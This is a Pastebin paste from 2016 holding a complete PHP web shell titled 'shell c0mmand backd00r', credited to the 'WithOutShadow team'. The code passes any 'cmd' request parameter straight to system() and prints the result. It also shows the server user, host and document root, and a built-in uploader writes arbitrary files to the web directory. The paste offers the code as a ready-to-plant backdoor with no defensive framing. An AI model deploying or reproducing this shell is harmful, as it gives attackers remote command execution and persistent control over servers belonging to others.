Advertisement
shutdown57

terminal shell command

Aug 7th, 2016
1,206
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.37 KB | None | 0 0
  1.  
  2. <html>
  3. <head>
  4. <title>shell c0mmand backd00r </title>
  5. </head>
  6. <body>
  7. <style>
  8. body{
  9. background:#000;
  10. color:#fff;
  11. }
  12. textarea{
  13. width:90%;
  14. height:500px;
  15. border:0;
  16. background:transparent;
  17. color:#81ff00;
  18. }
  19.  
  20. </style>
  21. <form method="get">
  22. <fieldset><legend>Terminal</legend>
  23. <pre>
  24. <font color="red">
  25.  /$$      /$$ /$$   /$$     /$$        /$$$$$$              /$$      /$$$$$$  /$$                       /$$                        
  26. | $$  /$ | $$|__/  | $$    | $$       /$$__  $$            | $$     /$$__  $$| $$                      | $$                        
  27. | $$ /$$$| $$ /$$ /$$$$$$  | $$$$$$$ | $$  \ $$ /$$   /$$ /$$$$$$  | $$  \__/| $$$$$$$   /$$$$$$   /$$$$$$$  /$$$$$$  /$$  /$$  /$$
  28. | $$/$$ $$ $$| $$|_  $$_/  | $$__  $$| $$  | $$| $$  | $$|_  $$_/  |  $$$$$$ | $$__  $$ |____  $$ /$$__  $$ /$$__  $$| $$ | $$ | $$</font>
  29. | $$$$_  $$$$| $$  | $$    | $$  \ $$| $$  | $$| $$  | $$  | $$     \____  $$| $$  \ $$  /$$$$$$$| $$  | $$| $$  \ $$| $$ | $$ | $$
  30. | $$$/ \  $$$| $$  | $$ /$$| $$  | $$| $$  | $$| $$  | $$  | $$ /$$ /$$  \ $$| $$  | $$ /$$__  $$| $$  | $$| $$  | $$| $$ | $$ | $$
  31. | $$/   \  $$| $$  |  $$$$/| $$  | $$|  $$$$$$/|  $$$$$$/  |  $$$$/|  $$$$$$/| $$  | $$|  $$$$$$$|  $$$$$$$|  $$$$$$/|  $$$$$/$$$$/
  32. |__/     \__/|__/   \___/  |__/  |__/ \______/  \______/    \___/   \______/ |__/  |__/ \_______/ \_______/ \______/  \_____/\___/
  33.                                                                                                                                    
  34.   <?php
  35.   if(!function_exists('system')){
  36. echo"<h1 STYLE='COLOR:RED'> TIDAK BISA GAN.. WBESITE NYA GAK SUPPORT </H1>";
  37. }else{
  38.   if(!function_exists('posix_getegid')) {
  39.     $user = @get_current_user();
  40.     $uid = @getmyuid();
  41.     $gid = @getmygid();
  42.     $group = "?";
  43. } else {
  44.     $uid = @posix_getpwuid(posix_geteuid());
  45.     $gid = @posix_getgrgid(posix_getegid());
  46.     $user = $uid['name'];
  47.     $uid = $uid['uid'];
  48.     $group = $gid['name'];
  49.     $gid = $gid['gid'];
  50. }
  51. echo"<font color=red>".$user."</font>@<font color=green>".$_SERVER['HTTP_HOST'].":</font><font color=blue>".$_SERVER['DOCUMENT_ROOT']."</font> #<input type=\"text\" name=\"cmd\" style=\"background:transparent;color:#81ff00;border:0;\"></form>";
  52.  
  53. if(isset($_REQUEST['cmd'])){
  54.         echo "<center><textarea readonly>";
  55.         $cmd = ($_REQUEST['cmd']);
  56.         system($cmd);
  57.         echo "</textarea></center>";
  58. if($_REQUEST['cmd']=='upload'){
  59. ?>
  60. <pre>
  61. +--------------------------------------------------------------------+
  62. |                            <b><i>WithOutShadow team</i></b>                      |
  63. |                     'just noob who learn from experince'           |
  64. |                        <b><i><font color=lime> [+] SIMPLE UPLOADER  [+] </font></i></b>                  |
  65. |                          c0ded by : shutdown57                     |
  66. +--------------------------------------------------------------------+
  67. </pre>
  68. <form method="post" enctype="multipart/form-data">
  69. <input type="file" name="files" ><input type="submit" name="submit" value="upload">
  70. </form>
  71. <?php
  72. if(isset($_POST['submit'])){
  73. if(move_uploaded_file($_FILES['files']['tmp_name'],"./".$_FILES['files']['name'])){
  74. echo"upload done!";
  75. }
  76. }
  77. }
  78.         die;
  79. }
  80. }
  81. ?>
  82. </fieldset>
  83. SIAP MENJALANKAN PERINTAH TUAN ..!!!
  84.  
  85. upload : untuk memunculkan form uploader
  86. lainnya? seperti perintah biasa yang di gunakan!
  87.  
  88. <!--    http://www.withoutshadow.org   2016    -->
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement